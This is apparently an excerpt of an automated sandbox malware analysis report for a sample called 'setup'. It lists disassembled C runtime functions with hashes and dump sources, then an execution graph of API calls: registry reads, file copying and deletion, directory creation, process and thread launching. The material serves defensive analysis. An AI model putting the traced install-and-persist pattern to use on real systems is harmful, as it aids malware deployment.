                • __CxxThrowException@8.LIBCMT ref: 0040641F
                • __CxxThrowException@8.LIBCMT ref: 00406447
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3476068407-1866435925
                • Opcode ID: dcebe720d9a318b5fd43747065a873d1d6fac4c5ce60c65a612453d25b3251df
                • Instruction ID: 67f8a41c4051d41f5e92d64c5ed2fe81d4494d19a488f0c74c05dec37bcb4b30
                • Opcode Fuzzy Hash: dcebe720d9a318b5fd43747065a873d1d6fac4c5ce60c65a612453d25b3251df
                • Instruction Fuzzy Hash: 02018E751143007EC204EB21CC53FAF7398AB80704F808C2EB946A60C2EB7CE918C66E
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00418CD8,00000008,0040C756,00000000,00000000,?,00409A0C,?,00000001), ref: 0040C65F
                • __lock.LIBCMT ref: 0040C693
                  • Part of subcall function 004120A6: __mtinitlocknum.LIBCMT ref: 004120BC
                  • Part of subcall function 004120A6: __amsg_exit.LIBCMT ref: 004120C8
                  • Part of subcall function 004120A6: EnterCriticalSection.KERNEL32(00409A0C,00409A0C,?,0040C698,0000000D), ref: 004120D0
                • InterlockedIncrement.KERNEL32(10E8F04D), ref: 0040C6A0
                • __lock.LIBCMT ref: 0040C6B4
                • ___addlocaleref.LIBCMT ref: 0040C6D2
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL
                • API String ID: 637971194-2576044830
                • Opcode ID: 67cc218f8e90605de5e1fedb1a4f22bc942fa97acf823e52836c7a5268b584dc
                • Instruction ID: b768362c678b05ce65ffaab9d395ea4738b797b09decd87b9107d553bdcfe6ce
                • Opcode Fuzzy Hash: 67cc218f8e90605de5e1fedb1a4f22bc942fa97acf823e52836c7a5268b584dc
                • Instruction Fuzzy Hash: 8901A171401700DFD720AFA6C94574ABBF0BF50314F108A1FE499A73E1CBB8A584CB59
                APIs
                • __getptd.LIBCMT ref: 0040B9A0
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040B9B1
                • __getptd.LIBCMT ref: 0040B9BF
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$RCC$csm
                • API String ID: 803148776-2671469338
                • Opcode ID: d95cf18587199c074f1e4e6091dd9227b760f2886ea5cd7bbc55ef2bd5d6f2a6
                • Instruction ID: 51486afd0df8b4695865c98f1778c62a9337f5a5582a88292d8df86027a5db24
                • Opcode Fuzzy Hash: d95cf18587199c074f1e4e6091dd9227b760f2886ea5cd7bbc55ef2bd5d6f2a6
                • Instruction Fuzzy Hash: B4E0EDB012410C8FC710A765C18AF693294EF49318F1506B7A50CE72A2C73C98508ACA
                APIs
                • __CreateFrameInfo.LIBCMT ref: 0040BC59
                  • Part of subcall function 004090C3: __getptd.LIBCMT ref: 004090D1
                  • Part of subcall function 004090C3: __getptd.LIBCMT ref: 004090DF
                • __getptd.LIBCMT ref: 0040BC63
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040BC71
                • __getptd.LIBCMT ref: 0040BC7F
                • __getptd.LIBCMT ref: 0040BC8A
                • _CallCatchBlock2.LIBCMT ref: 0040BCB0
                  • Part of subcall function 00409168: __CallSettingFrame@12.LIBCMT ref: 004091B4
                  • Part of subcall function 0040BD57: __getptd.LIBCMT ref: 0040BD66
                  • Part of subcall function 0040BD57: __getptd.LIBCMT ref: 0040BD74
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 31827d3d99e948d9a99a61204dfdd885f97f422d913b0096321dd7dd958519e5
                • Instruction ID: ff16f79eb663340c76d80c0268cb68fc8c1910eb21981e23cbfd897c3033905b
                • Opcode Fuzzy Hash: 31827d3d99e948d9a99a61204dfdd885f97f422d913b0096321dd7dd958519e5
                • Instruction Fuzzy Hash: 7A11DAB5D00209DFDB00EFA5C485ADEB7B0FF04314F10816AF815A7292DB389A159F58
                APIs
                • __getptd.LIBCMT ref: 0040FE99
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __amsg_exit.LIBCMT ref: 0040FEB9
                • __lock.LIBCMT ref: 0040FEC9
                • InterlockedDecrement.KERNEL32(?,00418D88,0000000C,004097EB,?,?,00409A0C), ref: 0040FEE6
                • _free.LIBCMT ref: 0040FEF9
                • InterlockedIncrement.KERNEL32(004ABEC8,00418D88,0000000C,004097EB,?,?,00409A0C), ref: 0040FF11
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: a7bd57b583e21d6a8ac2e9e883a3bd6fa43c1597edd5ae3d936e182c3787d4ae
                • Instruction ID: ea0bfd038d8f398dde78786cd25fa227568cef715600d59ca9d9c8a76ca3a570
                • Opcode Fuzzy Hash: a7bd57b583e21d6a8ac2e9e883a3bd6fa43c1597edd5ae3d936e182c3787d4ae
                • Instruction Fuzzy Hash: B2018E32D00622EBC731ABA5D84679A76A0BF41714F14023BE804B3AE1CB3C5845DBDD
                APIs
                • ___BuildCatchObject.LIBCMT ref: 0040BFF1
                  • Part of subcall function 0040BF4C: ___BuildCatchObjectHelper.LIBCMT ref: 0040BF82
                • _UnwindNestedFrames.LIBCMT ref: 0040C008
                • ___FrameUnwindToState.LIBCMT ref: 0040C016
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm$csm
                • API String ID: 2163707966-3733052814
                • Opcode ID: b8fa8ff8d99caff4ab9ba5b96f38fb8ed5015abb4b7a7a5e9efffb87fed2daef
                • Instruction ID: e3d0a9e8064a7505e1b410320f65b9c0aeab2ebf74c7c542e98ec29b955c8f78
                • Opcode Fuzzy Hash: b8fa8ff8d99caff4ab9ba5b96f38fb8ed5015abb4b7a7a5e9efffb87fed2daef
                • Instruction Fuzzy Hash: 9801287100010AFBDF226F52CC45EAB3E6AFF04344F14412ABD48651A1DB3AD871EBE8
                APIs
                • _malloc.LIBCMT ref: 004091E2
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                • std::exception::exception.LIBCMT ref: 00409217
                • std::exception::exception.LIBCMT ref: 00409231
                • __CxxThrowException@8.LIBCMT ref: 00409242
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                • String ID: bad allocation
                • API String ID: 1414122017-2104205924
                • Opcode ID: b4a94c6ebf1a3133feba4a1f6ff9f590ddc215d4c5779bd997423df818d684e9
                • Instruction ID: 67a5e63f996d886ebf1624c4bf591a6a96beae6ddf9fd96746d291f21c60ecc3
                • Opcode Fuzzy Hash: b4a94c6ebf1a3133feba4a1f6ff9f590ddc215d4c5779bd997423df818d684e9
                • Instruction Fuzzy Hash: A0F0F97150020566DF14F795DC46AAE3AB55F50B04F14083FE801B62E2CF788E469649
                APIs
                • _malloc.LIBCMT ref: 004092AD
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                • _free.LIBCMT ref: 004092C0
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: d6153298086588fc4a1cfb45786697eabffaa3bf0c1d10b8c6e349a9b5b2ccc3
                • Instruction ID: 00fb54e0d6e6f7d97a281707232910f34a2afd22c9c70b3c4bda47d21053d458
                • Opcode Fuzzy Hash: d6153298086588fc4a1cfb45786697eabffaa3bf0c1d10b8c6e349a9b5b2ccc3
                • Instruction Fuzzy Hash: 0A119872401515EBCB213B75AC05A9A36A89F943A4B20853FFC45FA2F2DB3C8C419A9C
                APIs
                • __getptd.LIBCMT ref: 0041061A
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 00410631
                • __amsg_exit.LIBCMT ref: 0041063F
                • __lock.LIBCMT ref: 0041064F
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00410663
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: ce91fedbc6c1533011ab1e51e18f3be8b6d7702f30d9236eab961568829d2e60
                • Instruction ID: 8ac645b88e2dd6a322ab5944c51c959f4918b763dc00cf9017fabeed402b29c2
                • Opcode Fuzzy Hash: ce91fedbc6c1533011ab1e51e18f3be8b6d7702f30d9236eab961568829d2e60
                • Instruction Fuzzy Hash: 71F09631D41710DBD720BBA5D847B8A36D06F41728F10421FF404A72D2CBBC59D19E5E
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00407661
                  • Part of subcall function 00404E30: std::_Lockit::_Lockit.LIBCPMT ref: 00404E3F
                • std::bad_exception::bad_exception.LIBCMT ref: 004076B8
                • __CxxThrowException@8.LIBCMT ref: 004076C7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 2513498551-3145022300
                • Opcode ID: 3cbe71b3766487ce18d94ca85fddc6bfcc3a5855d5b5897b6b8b824fa36a65e7
                • Instruction ID: dc548ee90676d7fde275af7051f8754d731853e423fb1247d09d685a38f9a49c
                • Opcode Fuzzy Hash: 3cbe71b3766487ce18d94ca85fddc6bfcc3a5855d5b5897b6b8b824fa36a65e7
                • Instruction Fuzzy Hash: E511D371908710ABC210EB65D841B6FB7A4AB94778F504A3EF565633D1CF3C9805879A
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004071B1
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040720A
                  • Part of subcall function 00404DD0: std::exception::exception.LIBCMT ref: 00404DD8
                • __CxxThrowException@8.LIBCMT ref: 00407203
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::exception
                • String ID: bad locale name
                • API String ID: 3240751772-1405518554
                • Opcode ID: d45845da433ca22ffc5e2e2b39c62ffe017800330f68b47fcd2a2e6b50f35698
                • Instruction ID: 2f997e07d1cbbf8b208aeb3d4ba948306f6691ddf2c04528aab1b6de1bf80412
                • Opcode Fuzzy Hash: d45845da433ca22ffc5e2e2b39c62ffe017800330f68b47fcd2a2e6b50f35698
                • Instruction Fuzzy Hash: E4017170544A00AED310EF15D846B9BB7E8EF60714F408A7FF05562AD2DB7CA909CB6A
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414E47
                • __isleadbyte_l.LIBCMT ref: 00414E7A
                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,00000000,?,?), ref: 00414EAB
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,00000000,?,?), ref: 00414F19
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: c321028ee607638beb9b2895bd493bb576520b7be75ae6a537a551ebcb90963e
                • Instruction ID: 414495a4fc8555345b78eedeead350e879e29d50e2dd4d99a23bb83a56100b44
                • Opcode Fuzzy Hash: c321028ee607638beb9b2895bd493bb576520b7be75ae6a537a551ebcb90963e
                • Instruction Fuzzy Hash: E831D031A00345EFCB21DF64C880DEA7BA5FF81310F1989AAE4659B291D335DDC1DB58
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 00408298
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 00408786
                  • Part of subcall function 00408771: __CxxThrowException@8.LIBCMT ref: 0040879B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 004087AC
                  • Part of subcall function 00408216: std::_Xinvalid_argument.LIBCPMT ref: 00408229
                • _memmove.LIBCMT ref: 004082F3
                Strings
                • invalid string position, xrefs: 00408293
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                • String ID: invalid string position
                • API String ID: 3404309857-1799206989
                • Opcode ID: 9f332a16aa2539bdcf05ebb50af76097cb82bffd1cd9de518c3fd041d25a16a7
                • Instruction ID: 89c772f9fdfe9c93302187d2a70675543a63902dfa4d158703fde6b72de5b998
                • Opcode Fuzzy Hash: 9f332a16aa2539bdcf05ebb50af76097cb82bffd1cd9de518c3fd041d25a16a7
                • Instruction Fuzzy Hash: F11104313006109BCB249E4D9E40E2AB7A5EB91B14B20097FF892B73C1CF79D801C79D
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 0040808B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 00408786
                  • Part of subcall function 00408771: __CxxThrowException@8.LIBCMT ref: 0040879B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 004087AC
                • _memmove.LIBCMT ref: 004080C4
                Strings
                • invalid string position, xrefs: 00408086
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                • String ID: invalid string position
                • API String ID: 1785806476-1799206989
                • Opcode ID: 8a62ff70c8136bcf9158a2ab6e4df868be6f154fa7a7e9c22e48eceaec0ec74b
                • Instruction ID: b438a7fb66b98a2c793e571057fbb88e6c718bfd8c3db85673638d7bf3199fb7
                • Opcode Fuzzy Hash: 8a62ff70c8136bcf9158a2ab6e4df868be6f154fa7a7e9c22e48eceaec0ec74b
                • Instruction Fuzzy Hash: 0301F5313002008BD3248E68CE80827B3A6EBC1714732493EE5C297385DF7AEC4A87AC
                APIs
                  • Part of subcall function 00409116: __getptd.LIBCMT ref: 0040911C
                  • Part of subcall function 00409116: __getptd.LIBCMT ref: 0040912C
                • __getptd.LIBCMT ref: 0040BD66
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040BD74
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: a09420094ac075c62cd0e7adeedfd7bae899a5ac82c0cf2af40aa39917a17090
                • Instruction ID: d3c89b7d8c5d10138144b8d4382eef4abb43720a50e85da47955f128d595be96
                • Opcode Fuzzy Hash: a09420094ac075c62cd0e7adeedfd7bae899a5ac82c0cf2af40aa39917a17090
                • Instruction Fuzzy Hash: A70128348206078BCF359F21C484AAEB7B5EF10315F18453FE445762D2CB398981DE8D
                APIs
                  • Part of subcall function 004080ED: _memmove.LIBCMT ref: 0040810F
                • __CxxThrowException@8.LIBCMT ref: 00408210
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                • std::_Xinvalid_argument.LIBCPMT ref: 00408229
                  • Part of subcall function 00408724: std::exception::exception.LIBCMT ref: 00408739
                  • Part of subcall function 00408724: __CxxThrowException@8.LIBCMT ref: 0040874E
                  • Part of subcall function 00408724: std::exception::exception.LIBCMT ref: 0040875F
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argument_memmovestd::_
                • String ID: string too long
                • API String ID: 224251009-2556327735
                • Opcode ID: fd0ffbea2288f3ca92735c054780d65956cdcc12e04167feab602ece8f4daa74
                • Instruction ID: 5ba97528ee0137129c482735d0a878e253dc9b220439154e68826d5de924f9ee
                • Opcode Fuzzy Hash: fd0ffbea2288f3ca92735c054780d65956cdcc12e04167feab602ece8f4daa74
                • Instruction Fuzzy Hash: 98E0E53150143437CA1075A65E01DDF3A49DF41764B21097FF594BB0C2CE39D84181ED

                Execution Graph

                Execution Coverage:7.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:13.8%
                Total number of Nodes:2000
                Total number of Limit Nodes:28
                execution_graph 41582 41bae0 41583 41bba0 41582->41583 41584 41bb13 41582->41584 41585 41bf3d 41583->41585 41586 41bbad 41583->41586 41587 41bb15 41584->41587 41588 41bb54 41584->41588 41595 41bf65 IsWindow 41585->41595 41596 41bf9a DefWindowProcW 41585->41596 41590 41bbb0 DefWindowProcW 41586->41590 41591 41bbd7 41586->41591 41592 41bb47 PostQuitMessage 41587->41592 41593 41bb1c 41587->41593 41589 41bb70 41588->41589 41594 41bb75 DefWindowProcW 41588->41594 41658 420c62 41591->41658 41592->41589 41593->41589 41593->41590 41600 41bb2e 41593->41600 41595->41589 41598 41bf73 DestroyWindow 41595->41598 41598->41589 41600->41589 41621 411cd0 41600->41621 41602 41bc26 41682 41ce80 59 API calls _memmove 41602->41682 41605 41bb3f 41605->41595 41606 41bc3a 41683 420bed 41606->41683 41608 41befb IsWindow 41609 41bf11 41608->41609 41610 41bf28 41608->41610 41609->41610 41611 41bf1a DestroyWindow 41609->41611 41610->41589 41611->41610 41612 41bef7 41612->41608 41612->41610 41613 414690 59 API calls 41618 41bcdc 41613->41618 41618->41608 41618->41612 41618->41613 41620 41be8f CreateThread 41618->41620 41689 40eff0 65 API calls 41618->41689 41690 41c330 41618->41690 41696 41c240 41618->41696 41702 41b8b0 41618->41702 41724 41ce80 59 API calls _memmove 41618->41724 41620->41618 41725 42f7c0 41621->41725 41624 411d20 _memset 41626 411d40 RegQueryValueExW RegCloseKey 41624->41626 41625 411e6a 41625->41605 41627 411d8f 41626->41627 41727 415c10 41627->41727 41629 411dbf 41630 411dd1 lstrlenA 41629->41630 41631 411e7c 41629->41631 41742 413520 41630->41742 41633 411e94 6 API calls 41631->41633 41634 411e89 41631->41634 41635 411ef5 UuidCreate UuidToStringW 41633->41635 41634->41633 41638 411f36 41635->41638 41636 411e3c PathFileExistsW 41636->41631 41639 411e52 41636->41639 41637 411df1 41637->41636 41638->41638 41640 415c10 59 API calls 41638->41640 41639->41625 41745 414690 41639->41745 41641 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 41640->41641 41643 411fce 41641->41643 41645 411f98 41641->41645 41644 415c10 59 API calls 41643->41644 41647 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 41644->41647 41646 415c10 59 API calls 41645->41646 41646->41643 41648 41207c _memset 41647->41648 41650 4121d1 41647->41650 41649 412095 6 API calls 41648->41649 41651 412115 _memset 41649->41651 41652 412109 41649->41652 41650->41625 41654 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 41651->41654 41768 413260 41652->41768 41655 4121b2 41654->41655 41656 4121aa GetLastError 41654->41656 41657 4121c0 WaitForSingleObject 41655->41657 41656->41650 41657->41650 41657->41657 41659 420cdd 41658->41659 41667 420c6e 41658->41667 41817 42793d DecodePointer 41659->41817 41661 420ce3 41663 425208 __vsnwprintf_s_l 57 API calls 41661->41663 41674 41bbe9 GetComputerNameW 41663->41674 41664 420ca1 RtlAllocateHeap 41664->41667 41664->41674 41666 420cc9 41814 425208 41666->41814 41667->41664 41667->41666 41671 420cc7 41667->41671 41672 420c79 41667->41672 41813 42793d DecodePointer 41667->41813 41673 425208 __vsnwprintf_s_l 57 API calls 41671->41673 41672->41667 41808 427f51 58 API calls 2 library calls 41672->41808 41809 427fae 58 API calls 9 library calls 41672->41809 41810 427b0b 41672->41810 41673->41674 41675 413100 41674->41675 41676 413121 41675->41676 41677 413133 41675->41677 41678 415c10 59 API calls 41676->41678 41680 415c10 59 API calls 41677->41680 41679 41312c 41678->41679 41679->41602 41681 413159 41680->41681 41681->41602 41682->41606 41684 420c1f _free 41683->41684 41685 420bf6 RtlFreeHeap 41683->41685 41684->41618 41685->41684 41686 420c0b 41685->41686 41687 425208 __vsnwprintf_s_l 56 API calls 41686->41687 41688 420c11 GetLastError 